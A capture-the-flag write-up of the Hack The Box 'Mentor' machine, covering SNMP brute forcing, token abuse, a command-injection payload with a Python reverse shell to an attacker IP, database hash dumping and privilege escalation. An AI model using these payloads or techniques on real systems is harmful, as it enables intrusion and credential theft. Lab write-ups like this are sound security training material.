> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-mentor.md).

# HTB - Mentor

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLRBBHjqQFdREAHD4m4vJ%2Fimage.png?alt=media&amp;token=9b7fe975-c714-497a-89eb-80423355b4bd" alt=""><figcaption></figcaption></figure>

add to hosts file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGVXhGRbhSCy1rUnXLjVH%2Fimage.png?alt=media&amp;token=7eb7c6cf-db05-4478-9fb9-3cc1bba4d437" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9XtIsphqFCfYVJkIf8Yj%2Fimage.png?alt=media&amp;token=feb40989-7075-4ea4-8ca2-fc0bb6d2519e" alt=""><figcaption></figcaption></figure>

the web application is running on flask 2.0.3 framework.

no interesting directories found.

nothing interesting on port 80.

```bash
──(ajay㉿kali)-[~]
└─$ ffuf -H "Host:FUZZ.mentorquotes.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://mentorquotes.htb/ -fw 18 -mc all

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://mentorquotes.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.mentorquotes.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response words: 18
________________________________________________

api                     [Status: 404, Size: 22, Words: 2, Lines: 1, Duration: 47ms]

```

add it to hosts file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVRTMiJesIH7FYordcTOK%2Fimage.png?alt=media&amp;token=11487ff6-429d-4a15-9ed6-6d709219dfdb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqXoOx1xfKzBrv9A0H55j%2Fimage.png?alt=media&amp;token=fe2ee24f-1983-4add-8ee1-51081e485013" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDiEI3NeSch8Pgt7XQdox%2Fimage.png?alt=media&amp;token=e510a154-924b-4984-8701-1cde71e90bc5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fo3kWHfVTPJSbRMP4SMBg%2Fimage.png?alt=media&amp;token=0e7becf6-0776-413c-82bd-a9b2de4876e2" alt=""><figcaption></figcaption></figure>

accessing the /admin gives authorisation header is required.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fb6FuRJ47JxuDZNTPFb3p%2Fimage.png?alt=media&amp;token=280e0324-ca4b-46ad-a145-f959143bca5a" alt=""><figcaption></figcaption></figure>

docs redirects to the interactive access to the api endpoint.

but we need the Authorisation header inorder to make use of this.

#### UDP port Scan

```bash
──(ajay㉿kali)-[~]
└─$ nmap -sU -sV --min-rate 100 10.129.228.102 -p 161
Starting Nmap 7.98 ( https://nmap.org ) at 2026-08-24 04:32 +0000
Nmap scan report for mentorquotes.htb (10.129.228.102)
Host is up (0.047s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: mentor

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
```

### SNMP

```bash
┌──(ajay㉿kali)-[~]
└─$ snmpwalk -v2c -c public 10.129.228.102
iso.3.6.1.2.1.1.1.0 = STRING: "Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (106681) 0:17:46.81
iso.3.6.1.2.1.1.4.0 = STRING: "Me <admin@mentorquotes.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "mentor"
iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (108001) 0:18:00.01
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 EA 08 18 04 0F 25 00 2B 00 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-56-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 230
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

```

no interesting data i will use onesixtyone to bruteforce community strings

```bash
┌──(ajay㉿kali)-[~]
└─$ onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 10.129.228.102
Scanning 1 hosts, 122 communities
10.129.228.102 [public] Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
                                                                                                                                                                       
┌──(ajay㉿kali)-[~]
└─$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt 10.129.228.102
Scanning 1 hosts, 120 communities
10.129.228.102 [public] Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
10.129.228.102 [public] Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
                                                                                                              
```

got the same community string. onesixtyone only work with snmp v1 it doesnt work with other versions. so i will probably use snmpbrute.py

```bash
──(ajay㉿kali)-[~/Tools/SNMP-Brute]
└─$ python snmpbrute.py -t 10.129.228.102                                                      
/usr/lib/python3/dist-packages/scapy/layers/tls/crypto/groups.py:25: CryptographyDeprecationWarning: Diffie-Hellman over finite fields (FFDH) is deprecated and support will be removed in a future release. Use a more modern key exchange algorithm.
  from cryptography.hazmat.primitives.asymmetric.dh import DHParameterNumbers
   _____ _   ____  _______     ____             __     
  / ___// | / /  |/  / __ \   / __ )_______  __/ /____ 
  \__ \/  |/ / /|_/ / /_/ /  / __  / ___/ / / / __/ _ \
 ___/ / /|  / /  / / ____/  / /_/ / /  / /_/ / /_/  __/
/____/_/ |_/_/  /_/_/      /_____/_/   \__,_/\__/\___/ 

SNMP Bruteforce & Enumeration Script v2.0
http://www.secforce.com / nikos.vassakis <at> secforce.com
###############################################################

Trying ['', '0', '0392a0', '1234', '2read', '3com', '3Com', '3COM', '4changes', 'access', 'adm', 'admin', 'Admin', 'administrator', 'agent', 'agent_steal', 'all', 'all private', 'all public', 'anycom', 'ANYCOM', 'apc', 'bintec', 'blue', 'boss', 'c', 'C0de', 'cable-d', 'cable_docsispublic@es0', 'cacti', 'canon_admin', 'cascade', 'cc', 'changeme', 'cisco', 'CISCO', 'cmaker', 'comcomcom', 'community', 'core', 'CR52401', 'crest', 'debug', 'default', 'demo', 'dilbert', 'enable', 'entry', 'field', 'field-service', 'freekevin', 'friend', 'fubar', 'guest', 'hello', 'hideit', 'host', 'hp_admin', 'ibm', 'IBM', 'ilmi', 'ILMI', 'intel', 'Intel', 'intermec', 'Intermec', 'internal', 'internet', 'ios', 'isdn', 'l2', 'l3', 'lan', 'liteon', 'login', 'logon', 'lucenttech', 'lucenttech1', 'lucenttech2', 'manager', 'master', 'microsoft', 'mngr', 'mngt', 'monitor', 'mrtg', 'nagios', 'net', 'netman', 'network', 'nobody', 'NoGaH$@!', 'none', 'notsopublic', 'nt', 'ntopia', 'openview', 'operator', 'OrigEquipMfr', 'ourCommStr', 'pass', 'passcode', 'password', 'PASSWORD', 'pr1v4t3', 'pr1vat3', 'private', ' private', 'private ', 'Private', 'PRIVATE', 'private@es0', 'Private@es0', 'private@es1', 'Private@es1', 'proxy', 'publ1c', 'public', ' public', 'public ', 'Public', 'PUBLIC', 'public@es0', 'public@es1', 'public/RO', 'read', 'read-only', 'readwrite', 'read-write', 'red', 'regional', '<removed>', 'rmon', 'rmon_admin', 'ro', 'root', 'router', 'rw', 'rwa', 'sanfran', 'san-fran', 'scotty', 'secret', 'Secret', 'SECRET', 'Secret C0de', 'security', 'Security', 'SECURITY', 'seri', 'server', 'snmp', 'SNMP', 'snmpd', 'snmptrap', 'snmp-Trap', 'SNMP_trap', 'SNMPv1/v2c', 'SNMPv2c', 'solaris', 'solarwinds', 'sun', 'SUN', 'superuser', 'supervisor', 'support', 'switch', 'Switch', 'SWITCH', 'sysadm', 'sysop', 'Sysop', 'system', 'System', 'SYSTEM', 'tech', 'telnet', 'TENmanUFactOryPOWER', 'test', 'TEST', 'test2', 'tiv0li', 'tivoli', 'topsecret', 'traffic', 'trap', 'user', 'vterm1', 'watch', 'watchit', 'windows', 'windowsnt', 'workstation', 'world', 'write', 'writeit', 'xyzzy', 'yellow', 'ILMI'] community strings ...
10.129.228.102 : 161    Version (v2c):  internal
10.129.228.102 : 161    Version (v1):   public
10.129.228.102 : 161    Version (v2c):  public
10.129.228.102 : 161    Version (v1):   public
10.129.228.102 : 161    Version (v2c):  public
Waiting for late packets (CTRL+C to stop)

Trying identified strings for READ-WRITE ...                                                                                                                           

Identified Community strings                                                                                                                                           
        0) 10.129.228.102  internal (v2c)(RO)
        1) 10.129.228.102  public (v1)(RO)
        2) 10.129.228.102  public (v2c)(RO)
        3) 10.129.228.102  public (v1)(RO)
        4) 10.129.228.102  public (v2c)(RO)
Select Community to Enumerate [0]:0

Enumerating with READ-WRITE Community string: internal (v2c)                                                                                                           
################## Enumerating Routing Table (snmpwalk)
        Destination             Next Hop        Mask                    Metric  Interface       Type    Protocol        Age
        -----------             --------        ----                    ------  ---------       ----    --------        ---
        0.0.0.0                 10.129.0.1      0.0.0.0                   1         2            4         2            OID

```

the script is trying to dump data using one of those but it results in error so i will do separately manually.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrA2aV88N4PZQDxvzuKm5%2Fimage.png?alt=media&amp;token=68509a81-45d1-40fc-b7a8-7c5b422e3fc1" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ snmpbulkwalk -v2c -c internal 10.129.228.102
iso.3.6.1.2.1.1.1.0 = STRING: "Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (289440) 0:48:14.40
iso.3.6.1.2.1.1.4.0 = STRING: "Me <admin@mentorquotes.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "mentor"
iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
<SNIP>
1201 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f"
iso.3.6.1.2.1.25.4.2.1.5.1207 = ""
iso.3.6.1.2.1.25.4.2.1.5.1231 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.1234 = ""
iso.3.6.1.2.1.25.4.2.1.5.1256 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1317 = STRING: "-H fd:// --containerd=/run/containerd/containerd.sock"
iso.3.6.1.2.1.25.4.2.1.5.1665 = STRING: "/usr/local/bin/login.sh"
iso.3.6.1.2.1.25.4.2.1.5.1733 = STRING: "-proto tcp -host-ip 172.22.0.1 -host-port 5432 -container-ip 172.22.0.4 -container-port 5432"
iso.3.6.1.2.1.25.4.2.1.5.1747 = STRING: "-namespace moby -id 96e44c5692920491cdb954f3d352b3532a88425979cd48b3959b63bfec98a6f4 -address /run/containerd/containerd.sock"
iso.3.6.1.2.1.25.4.2.1.5.1768 = ""
iso.3.6.1.2.1.25.4.2.1.5.1848 = STRING: "-proto tcp -host-ip 172.22.0.1 -host-port 8000 -container-ip 172.22.0.3 -container-port 8000"
iso.3.6.1.2.1.25.4.2.1.5.1865 = STRING: "-namespace moby -id 40a945657b0fcb473823b8d3a2e5cc5e623571bc6a07b38ae6fe8af742c139c8 -address /run/containerd/containerd.sock"
iso.3.6.1.2.1.25.4.2.1.5.1885 = STRING: "-m uvicorn app.main:app --reload --workers 2 --host 0.0.0.0 --port 8000"
iso.3.6.1.2.1.25.4.2.1.5.1953 = ""
iso.3.6.1.2.1.25.4.2.1.5.1954 = ""
iso.3.6.1.2.1.25.4.2.1.5.1955 = ""
iso.3.6.1.2.1.25.4.2.1.5.1956 = ""
iso.3.6.1.2.1.25.4.2.1.5.1957 = ""
iso.3.6.1.2.1.25.4.2.1.5.1958 = ""
iso.3.6.1.2.1.25.4.2.1.5.1965 = STRING: "-proto tcp -host-ip 172.22.0.1 -host-port 81 -container-ip 172.22.0.2 -container-port 80"
iso.3.6.1.2.1.25.4.2.1.5.1981 = STRING: "-namespace moby -id 2f3ac5ecc64d27d6b7064bde476796ccb0d1b283fbf98df1fee6021059c2c932 -address /run/containerd/containerd.sock"
iso.3.6.1.2.1.25.4.2.1.5.1999 = STRING: "main.py"
iso.3.6.1.2.1.25.4.2.1.5.2053 = STRING: "-c from multiprocessing.semaphore_tracker import main;main(4)"
iso.3.6.1.2.1.25.4.2.1.5.2054 = STRING: "-c from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=5, pipe_handle=7) --multiprocessing-fork"
iso.3.6.1.2.1.25.4.2.1.5.2067 = ""
iso.3.6.1.2.1.25.4.2.1.5.2068 = ""
iso.3.6.1.2.1.25.4.2.1.5.2081 = STRING: "/usr/local/bin/login.py kj23sadkj123as0-d213"
```

login.py is run with some string look like password i already have james as valid user in from the api/users directory so i will try this against james.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWa1Q3FGRd5Hmw2meGwlA%2Fimage.png?alt=media&amp;token=b1186033-055a-4825-9d91-7790d4cd98c4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F60tWQngJD8bfLl9uC8ia%2Fimage.png?alt=media&amp;token=59b505db-15d5-4e93-9e1b-42c09f3cf723" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FD0vKDtHxB7Mjk6rkZnjg%2Fimage.png?alt=media&amp;token=d0bee8ec-3621-4ae1-8a50-50e40fe458b5" alt=""><figcaption></figcaption></figure>

success got the authorisation token, i can use this token.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FqmV5z5rHKbdg84nnnMkZ%2Fimage.png?alt=media&amp;token=227f1064-93cd-4f3e-abe7-edc909cdc5cb" alt=""><figcaption></figcaption></figure>

sending the authorisation token gives processing error that said i will use burpsuite to investigate further.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEdmyvuW7E6o2ZPXTqgM7%2Fimage.png?alt=media&amp;token=4d594e02-24f3-432a-9dbd-e1a74c82370c" alt=""><figcaption></figcaption></figure>

sending the authorisation token via the gui doesnt work as the api is poorly coded.

that said i  will manually send the token and see if i can access the users endpoint.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmW5B9lhAmyngFljBHeG5%2Fimage.png?alt=media&amp;token=5080f2dd-e62b-461a-9f64-0a148356341c" alt=""><figcaption></figcaption></figure>

there the token works by manually sending the authorisation token.

i can list two users but nothing interesting.

james user has permission to create and list users and quotes but they are not that useful as we cannot create a user by sending any role as parameter.

there is also a admin endpoint which is found earlier through feroxbuster.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fekm3vpLfXKncICTzXShv%2Fimage.png?alt=media&amp;token=7de9f6bd-951f-4c11-8309-58d67be19d6c" alt=""><figcaption></figcaption></figure>

accessing the admin panel using the james token confirms access.

this reveals that james is a admin user.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKXadmgUaF5xwYcT0wPjd%2Fimage.png?alt=media&amp;token=0395b7f6-c4ca-41d3-9b35-9db84380e876" alt=""><figcaption></figcaption></figure>

check endpoint says details not implemented with that info i will query the other endpoint too.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FJz4JwfcVTYxpYprISf05%2Fimage.png?alt=media&amp;token=a6a0acaa-db1f-4035-9073-5a7920786451" alt=""><figcaption></figcaption></figure>

backup endpoint does not allow GET method, will try accessing it via POST.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7E6BOPuEixFSPbpxD8RD%2Fimage.png?alt=media&amp;token=57738389-4744-4ff8-bfb8-5c21292c786a" alt=""><figcaption></figcaption></figure>

POST works and required certain parameters detailed in the response body.

It requires a body and a path. The response is in json so i will edit the request body to json format.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDpWcsowbWDr7szugkbGx%2Fimage.png?alt=media&amp;token=a885285e-fc0f-479f-ad98-cb6e1360368b" alt=""><figcaption></figcaption></figure>

sending custom data in the path returns Done so probably i can try for command injection.

### Command Injection

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoYV4YiHXoquKCN8RVpbq%2Fimage.png?alt=media&amp;token=aac2ffba-3ee4-44a8-a57e-a6ddcddf6e61" alt=""><figcaption></figcaption></figure>

returns the same done response so what i can do here is to test for blind command injection.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fo6lUBuAAc4KrioVWkGda%2Fimage.png?alt=media&amp;token=49aa5a16-143c-4251-9566-c4025d5ad2d2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxGfza8DTeo2bH8UmOxBv%2Fimage.png?alt=media&amp;token=060bdc53-e134-4db7-b43d-d174019b8e91" alt=""><figcaption></figcaption></figure>

Command injection confirmed.

That said i will get RCE.

```bash
{
  "path": "ajay; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.52\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
}
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fw3cFzwiKq609hYjQ3yTg%2Fimage.png?alt=media&amp;token=aaad88f8-88cc-46a1-8b2d-7373d9d7b29b" alt=""><figcaption></figcaption></figure>

## Shell as Root in container

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9qDI8c0zfhk3nlbIi7BN%2Fimage.png?alt=media&amp;token=1fa99e12-b7f2-4349-9db3-dfea0c7b06c7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnnJSM54DslbcqD1LXjR4%2Fimage.png?alt=media&amp;token=1c3cbfd9-a9eb-44b7-93e6-59fc5ae5e5c3" alt=""><figcaption></figcaption></figure>

i need to escape the docker container.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQ9v9e8Gfb73go5O95GKB%2Fimage.png?alt=media&amp;token=7b9f8c8d-d51a-497b-811c-f39efe61c0ba" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8aUp16CNKvMZRCdNT5C3%2Fimage.png?alt=media&amp;token=bf26e0c5-4753-434c-83a0-c929c22b87c3" alt=""><figcaption></figcaption></figure>

leaks a postgres db.

* **Host:** `172.22.0.1` (Docker gateway / host)
* **DB:** `mentorquotes_db`
* **User:** `postgres`
* **Pass:** `postgres`

Since you're on Alpine with no `psql`, use Python directly:

### Using python to read  Postgres Database

```sql
/app/app # python3 -c "
import psycopg2
conn = psycopg2.connect(host='172.22.0.1', dbname='mentorquotes_db', user='postgres', password='postgres')
cur = conn.cursor()
cur.execute('SELECT id, username, email, password FROM users;')
> for row in cur.fetchall():
    print(row)
"
> > > > > > (1, 'james', 'james@mentorquotes.htb', '7ccdcd8c05b59add9c198d492b36a503')
(2, 'service_acc', 'svc@mentorquotes.htb', '53f22d0dfa10dce7e29cd31f4f953fd8')
/app/app # 

```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fb5K9VnmgeOx57ttnxoyt%2Fimage.png?alt=media&amp;token=60a05a8b-93dd-4e5c-8c2a-012ce01d77ed" alt=""><figcaption></figcaption></figure>

crack station cracked the hash for svc user.

## Shell as SVC

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6Gr1vzlZlpLy5Qaa4l00%2Fimage.png?alt=media&amp;token=00faffbd-64e6-45e4-99e6-4c2017a80ac2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fz2zjaQJSDgTRSVYoA28z%2Fimage.png?alt=media&amp;token=4bd0e9b1-2f19-403d-8c40-d8a8ffbd63e4" alt=""><figcaption></figcaption></figure>

cant access James and the password found earlier do not work.

since the earlier password was found through snmp i will try looking at the config files of snmp to see if i can find any credentials.

```bash
svc@mentor:/etc/snmp$ ls
snmp.conf  snmpd.conf  snmpd.conf.d
svc@mentor:/etc/snmp$ cat snmpd.conf
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiR8esmtfFY0b4gmIFiC9%2Fimage.png?alt=media&amp;token=8b272001-de0e-495a-9a2d-12dadd7f38fc" alt=""><figcaption></figcaption></figure>

and the snmp configuration files leaked  a password which i can try against James.

## &#x20;Shell as James

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9emEyZUzAMbfsQ0oNjF6%2Fimage.png?alt=media&amp;token=eed00717-1a7e-48ea-98cc-d33a23c828a9" alt=""><figcaption></figcaption></figure>

and it worked.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpwpglwT8tOBu8ni7X2RA%2Fimage.png?alt=media&amp;token=bd16cfd7-54d8-42da-aed7-80b955534516" alt=""><figcaption></figcaption></figure>

james can run /bin/sh as root without password.

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRFdQliNWnHmQlZWlmPqQ%2Fimage.png?alt=media&amp;token=3904dbbf-79c7-49e5-8b24-ff32c5712eec" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

